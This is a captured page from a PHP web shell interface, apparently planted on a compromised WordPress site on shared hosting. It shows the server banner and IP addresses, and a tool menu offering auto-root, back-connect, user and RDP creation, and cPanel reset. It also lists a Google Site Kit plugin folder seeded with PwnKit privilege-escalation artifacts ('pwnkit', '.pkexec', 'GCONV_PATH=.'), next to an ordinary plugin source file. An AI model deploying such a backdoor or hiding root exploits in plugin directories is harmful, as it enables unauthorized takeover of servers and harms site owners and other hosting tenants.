Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.149.252.8
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Modules /
Analytics_4 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Advanced_Tracking
[ DIR ]
drwxr-xr-x
Conversion_Reporting
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
GoogleAnalyticsAdmin
[ DIR ]
drwxr-xr-x
Report
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
AMP_Tag.php
5.15
KB
-rw-r--r--
Account_Ticket.php
3.44
KB
-rw-r--r--
Advanced_Tracking.php
3.96
KB
-rw-r--r--
Audience_Settings.php
2.41
KB
-rw-r--r--
Custom_Dimensions_Data_Availab...
3.53
KB
-rw-r--r--
PivotReport.php
2.16
KB
-rw-r--r--
Report.php
990
B
-rw-r--r--
Reset_Audiences.php
3.86
KB
-rw-r--r--
Resource_Data_Availability_Dat...
7.55
KB
-rw-r--r--
Settings.php
6.36
KB
-rw-r--r--
Synchronize_AdSenseLinked.php
4.48
KB
-rw-r--r--
Synchronize_AdsLinked.php
3.21
KB
-rw-r--r--
Synchronize_Property.php
4.13
KB
-rw-r--r--
Tag_Guard.php
878
B
-rw-r--r--
Tag_Interface.php
821
B
-rw-r--r--
Tag_Matchers.php
2.1
KB
-rw-r--r--
Web_Tag.php
6.15
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Custom_Dimensions_Data_Available.php
<?php /** * Class Google\Site_Kit\Modules\Analytics_4\Custom_Dimensions_Data_Available * * @package Google\Site_Kit\Modules\Analytics_4 * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Modules\Analytics_4; use Google\Site_Kit\Core\Storage\Transients; /** * Class for updating Analytics 4 custom dimension data availability state. * * @since 1.113.0 * @access private * @ignore */ class Custom_Dimensions_Data_Available { /** * List of valid custom dimension slugs. * * @since 1.113.0 * @var array */ const CUSTOM_DIMENSION_SLUGS = array( 'googlesitekit_post_date', 'googlesitekit_post_author', 'googlesitekit_post_categories', 'googlesitekit_post_type', ); /** * Transients instance. * * @since 1.113.0 * @var Transients */ protected $transients; /** * Constructor. * * @since 1.113.0 * * @param Transients $transients Transients instance. */ public function __construct( Transients $transients ) { $this->transients = $transients; } /** * Gets data available transient name for the custom dimension. * * @since 1.113.0 * * @param string $custom_dimension Custom dimension slug. * @return string Data available transient name. */ protected function get_data_available_transient_name( $custom_dimension ) { return "googlesitekit_custom_dimension_{$custom_dimension}_data_available"; } /** * Gets data availability for all custom dimensions. * * @since 1.113.0 * * @return array Associative array of custom dimension names and their data availability state. */ public function get_data_availability() { return array_reduce( self::CUSTOM_DIMENSION_SLUGS, function ( $data_availability, $custom_dimension ) { $data_availability[ $custom_dimension ] = $this->is_data_available( $custom_dimension ); return $data_availability; }, array() ); } /** * Checks whether the data is available for the custom dimension. * * @since 1.113.0 * * @param string $custom_dimension Custom dimension slug. * @return bool True if data is available, false otherwise. */ protected function is_data_available( $custom_dimension ) { return (bool) $this->transients->get( $this->get_data_available_transient_name( $custom_dimension ) ); } /** * Sets the data available state for the custom dimension. * * @since 1.113.0 * * @param string $custom_dimension Custom dimension slug. * @return bool True on success, false otherwise. */ public function set_data_available( $custom_dimension ) { return $this->transients->set( $this->get_data_available_transient_name( $custom_dimension ), true ); } /** * Resets the data available state for all custom dimensions. * * @since 1.113.0 * @since 1.114.0 Added optional $custom_dimensions parameter. * * @param array $custom_dimensions Optional. List of custom dimension slugs to reset. */ public function reset_data_available( $custom_dimensions = self::CUSTOM_DIMENSION_SLUGS ) { foreach ( $custom_dimensions as $custom_dimension ) { $this->transients->delete( $this->get_data_available_transient_name( $custom_dimension ) ); } } /** * Checks whether the custom dimension is valid. * * @since 1.113.0 * * @param string $custom_dimension Custom dimension slug. * @return bool True if valid, false otherwise. */ public function is_valid_custom_dimension( $custom_dimension ) { return in_array( $custom_dimension, self::CUSTOM_DIMENSION_SLUGS, true ); } }
Close